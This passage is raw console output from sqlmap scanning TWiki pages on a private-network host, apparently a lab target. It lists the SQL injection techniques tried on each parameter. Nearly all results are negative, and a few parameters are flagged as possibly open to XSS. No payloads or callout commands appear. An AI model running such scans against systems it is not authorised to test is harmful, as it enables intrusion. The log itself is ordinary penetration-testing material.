[19:57:32] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:57:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:57:33] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:57:34] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:57:34] [INFO] testing 'MySQL inline queries' | |
[19:57:34] [INFO] testing 'PostgreSQL inline queries' | |
[19:57:34] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:57:34] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:57:34] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:57:35] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:57:35] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:57:36] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:57:36] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:57:37] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:57:37] [INFO] testing 'Oracle AND time-based blind' | |
[19:57:38] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:57:38] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:57:43] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:57:49] [WARNING] URI parameter '#1*' is not injectable | |
[19:57:49] [INFO] testing if URI parameter '#2*' is dynamic | |
[19:57:49] [INFO] confirming that URI parameter '#2*' is dynamic | |
[19:57:49] [INFO] URI parameter '#2*' is dynamic | |
[19:57:49] [WARNING] heuristic (basic) test shows that URI parameter '#2*' might not be injectable | |
[19:57:49] [INFO] testing for SQL injection on URI parameter '#2*' | |
[19:57:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:57:50] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:57:50] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:57:51] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:57:51] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:57:52] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:57:52] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:57:53] [INFO] testing 'MySQL inline queries' | |
[19:57:53] [INFO] testing 'PostgreSQL inline queries' | |
[19:57:53] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:57:53] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:57:53] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:57:54] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:57:54] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:57:55] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:57:55] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:57:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:57:56] [INFO] testing 'Oracle AND time-based blind' | |
[19:57:57] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:58:02] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:58:07] [WARNING] URI parameter '#2*' is not injectable | |
[19:58:07] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 151: | |
GET http://192.168.1.113:80/twiki/bin/view/TWiki/TextFormattingRules?skin=print | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:58:07] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/TextFormattingRules?skin=print' | |
[19:58:08] [INFO] testing connection to the target URL | |
[19:58:08] [INFO] testing if the target URL is stable | |
[19:58:09] [INFO] target URL is stable | |
[19:58:09] [INFO] testing if GET parameter 'skin' is dynamic | |
[19:58:09] [INFO] confirming that GET parameter 'skin' is dynamic | |
[19:58:09] [INFO] GET parameter 'skin' is dynamic | |
[19:58:09] [INFO] heuristics detected web page charset 'ascii' | |
[19:58:09] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable | |
[19:58:09] [INFO] testing for SQL injection on GET parameter 'skin' | |
[19:58:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:58:09] [WARNING] reflective value(s) found and filtering out | |
[19:58:11] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:58:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:58:12] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:58:13] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:58:13] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:58:14] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:58:14] [INFO] testing 'MySQL inline queries' | |
[19:58:14] [INFO] testing 'PostgreSQL inline queries' | |
[19:58:14] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:58:15] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:58:15] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:58:16] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:58:16] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:58:17] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:58:18] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:58:18] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:58:19] [INFO] testing 'Oracle AND time-based blind' | |
[19:58:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:58:20] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:58:28] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:58:36] [WARNING] GET parameter 'skin' is not injectable | |
[19:58:36] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 152: | |
GET http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TextFormattingRules?rev1=1.38&rev2=1.37 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:58:36] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TextFormattingRules?rev1=1.38&rev2=1.37' | |
[19:58:36] [INFO] testing connection to the target URL | |
[19:58:36] [INFO] testing if the target URL is stable | |
[19:58:37] [INFO] target URL is stable | |
[19:58:37] [INFO] testing if GET parameter 'rev1' is dynamic | |
[19:58:37] [WARNING] GET parameter 'rev1' does not appear dynamic | |
[19:58:37] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable | |
[19:58:37] [INFO] testing for SQL injection on GET parameter 'rev1' | |
[19:58:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:58:39] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:58:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:58:39] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:58:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:58:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:58:41] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:58:41] [INFO] testing 'MySQL inline queries' | |
[19:58:41] [INFO] testing 'PostgreSQL inline queries' | |
[19:58:41] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:58:41] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:58:42] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:58:42] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:58:42] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:58:43] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:58:43] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:58:44] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:58:44] [INFO] testing 'Oracle AND time-based blind' | |
[19:58:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:58:45] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:58:51] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:58:57] [WARNING] GET parameter 'rev1' is not injectable | |
[19:58:57] [INFO] testing if GET parameter 'rev2' is dynamic | |
[19:58:57] [WARNING] GET parameter 'rev2' does not appear dynamic | |
[19:58:57] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable | |
[19:58:57] [INFO] testing for SQL injection on GET parameter 'rev2' | |
[19:58:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:58:59] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:59:01] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:59:01] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:59:02] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:59:02] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:59:03] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:59:04] [INFO] testing 'MySQL inline queries' | |
[19:59:05] [INFO] testing 'PostgreSQL inline queries' | |
[19:59:05] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:59:06] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:59:07] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:59:07] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:59:08] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:59:08] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:59:09] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:59:09] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:59:10] [INFO] testing 'Oracle AND time-based blind' | |
[19:59:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:59:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:59:22] [WARNING] GET parameter 'rev2' is not injectable | |
[19:59:22] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 153: | |
GET http://192.168.1.113:80/twiki/bin/view/TWiki/TextFormattingRules?rev=1.37 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:59:22] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/TextFormattingRules?rev=1.37' | |
[19:59:22] [INFO] testing connection to the target URL | |
[19:59:23] [INFO] testing if the target URL is stable | |
[19:59:24] [INFO] target URL is stable | |
[19:59:24] [INFO] testing if GET parameter 'rev' is dynamic | |
[19:59:24] [WARNING] GET parameter 'rev' does not appear dynamic | |
[19:59:24] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable | |
[19:59:24] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks | |
[19:59:24] [INFO] testing for SQL injection on GET parameter 'rev' | |
[19:59:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:59:24] [WARNING] reflective value(s) found and filtering out | |
[19:59:26] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:59:26] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:59:27] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:59:27] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:59:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:59:28] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:59:29] [INFO] testing 'MySQL inline queries' | |
[19:59:29] [INFO] testing 'PostgreSQL inline queries' | |
[19:59:29] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:59:29] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:59:30] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:59:30] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:59:30] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:59:31] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:59:31] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:59:32] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:59:33] [INFO] testing 'Oracle AND time-based blind' | |
[19:59:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:59:33] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:59:41] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:59:48] [WARNING] GET parameter 'rev' is not injectable | |
[19:59:48] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[19:59:48] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TextFormattingRules?rev1=1.37&rev2=1.36' | |
[19:59:48] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/TextFormattingRules?rev=1.36' | |
URL 154: | |
GET http://192.168.1.113:80/twiki/bin/oops/TWiki/TextFormattingRules?template=oopsmore¶m1=1.38¶m2=1.38 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:59:48] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/TWiki/TextFormattingRules?template=oopsmore¶m1=1.38¶m2=1.38' | |
[19:59:48] [INFO] testing connection to the target URL | |
[19:59:49] [INFO] testing if the target URL is stable | |
[19:59:49] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on | |
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C | |
[19:59:49] [INFO] testing if GET parameter 'template' is dynamic | |
[19:59:49] [INFO] confirming that GET parameter 'template' is dynamic | |
[19:59:50] [INFO] GET parameter 'template' is dynamic | |
[19:59:50] [INFO] heuristics detected web page charset 'ascii' | |
[19:59:50] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable | |
[19:59:50] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks | |
[19:59:50] [INFO] testing for SQL injection on GET parameter 'template' | |
[19:59:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:59:50] [WARNING] reflective value(s) found and filtering out | |
[19:59:51] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:59:51] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:59:51] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:59:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:59:52] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:59:53] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:59:53] [INFO] testing 'MySQL inline queries' | |
[19:59:53] [INFO] testing 'PostgreSQL inline queries' | |
[19:59:53] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:59:53] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:59:53] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:59:54] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:59:54] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:59:54] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:59:55] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:59:55] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:59:56] [INFO] testing 'Oracle AND time-based blind' | |
[19:59:56] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:59:56] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:00:01] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:00:05] [WARNING] GET parameter 'template' is not injectable | |
[20:00:05] [INFO] testing if GET parameter 'param1' is dynamic | |
[20:00:05] [WARNING] GET parameter 'param1' does not appear dynamic | |
[20:00:05] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable | |
[20:00:05] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks | |
[20:00:05] [INFO] testing for SQL injection on GET parameter 'param1' | |
[20:00:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:00:07] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:00:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:00:08] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:00:08] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:00:09] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:00:10] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:00:10] [INFO] testing 'MySQL inline queries' | |
[20:00:10] [INFO] testing 'PostgreSQL inline queries' | |
[20:00:10] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:00:10] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:00:11] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:00:11] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:00:11] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:00:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:00:13] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:00:13] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:00:14] [INFO] testing 'Oracle AND time-based blind' | |
[20:00:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:00:22] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:00:29] [WARNING] GET parameter 'param1' is not injectable | |
[20:00:29] [INFO] testing if GET parameter 'param2' is dynamic | |
[20:00:29] [WARNING] GET parameter 'param2' does not appear dynamic | |
[20:00:29] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable | |
[20:00:30] [INFO] testing for SQL injection on GET parameter 'param2' | |
[20:00:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:00:31] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:00:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:00:32] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:00:32] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:00:33] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:00:34] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:00:34] [INFO] testing 'MySQL inline queries' | |
[20:00:34] [INFO] testing 'PostgreSQL inline queries' | |
[20:00:34] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:00:34] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:00:35] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:00:35] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:00:36] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:00:36] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:00:37] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:00:37] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:00:38] [INFO] testing 'Oracle AND time-based blind' | |
[20:00:38] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:00:41] [INFO] target URL appears to be UNION injectable with 10 columns | |
[20:00:41] [WARNING] applying generic concatenation with double pipes ('||') | |
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y | |
[20:00:45] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql') | |
[20:00:50] [INFO] testing 'MySQL UNION query (11) - 1 to 10 columns' | |
[20:00:59] [WARNING] GET parameter 'param2' is not injectable | |
[20:00:59] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 155: | |
GET http://192.168.1.113:80/twiki/bin/edit/TWiki/TWikiForms?t=1441457582 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:00:59] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/TWiki/TWikiForms?t=1441457582' | |
[20:00:59] [INFO] testing connection to the target URL | |
[20:00:59] [INFO] testing if the target URL is stable | |
[20:01:00] [INFO] target URL is stable | |
[20:01:00] [INFO] testing if GET parameter 't' is dynamic | |
[20:01:00] [WARNING] GET parameter 't' does not appear dynamic | |
[20:01:00] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable | |
[20:01:01] [INFO] testing for SQL injection on GET parameter 't' | |
[20:01:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:01:02] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:01:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:01:03] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:01:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:01:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:01:04] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:01:04] [INFO] testing 'MySQL inline queries' | |
[20:01:04] [INFO] testing 'PostgreSQL inline queries' | |
[20:01:04] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:01:05] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:01:05] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:01:05] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:01:06] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:01:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:01:07] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:01:07] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:01:08] [INFO] testing 'Oracle AND time-based blind' | |
[20:01:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:01:08] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:01:14] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:01:20] [WARNING] GET parameter 't' is not injectable | |
[20:01:20] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 156: | |
GET http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text®ex=on&search=TWiki *Forms[^A-Za-z] | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:01:20] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text®ex=on&search=TWiki *Forms[^A-Za-z]' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[20:01:20] [INFO] testing connection to the target URL | |
[20:01:21] [INFO] testing if the target URL is stable | |
[20:01:21] [INFO] target URL is stable | |
[20:01:21] [INFO] testing if URI parameter '#1*' is dynamic | |
[20:01:21] [INFO] confirming that URI parameter '#1*' is dynamic | |
[20:01:21] [INFO] URI parameter '#1*' is dynamic | |
[20:01:22] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[20:01:22] [INFO] testing for SQL injection on URI parameter '#1*' | |
[20:01:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:01:22] [WARNING] reflective value(s) found and filtering out | |
[20:01:24] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:01:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:01:24] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:01:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:01:25] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:01:26] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:01:26] [INFO] testing 'MySQL inline queries' | |
[20:01:26] [INFO] testing 'PostgreSQL inline queries' | |
[20:01:26] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:01:26] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:01:27] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:01:27] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:01:28] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:01:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:01:29] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:01:29] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:01:30] [INFO] testing 'Oracle AND time-based blind' | |
[20:01:30] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:01:30] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:01:36] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:01:41] [WARNING] URI parameter '#1*' is not injectable | |
[20:01:41] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 157: | |
GET http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiForms?skin=print | |
do you want to test this URL? [Y/n/q] | |
> Y | |
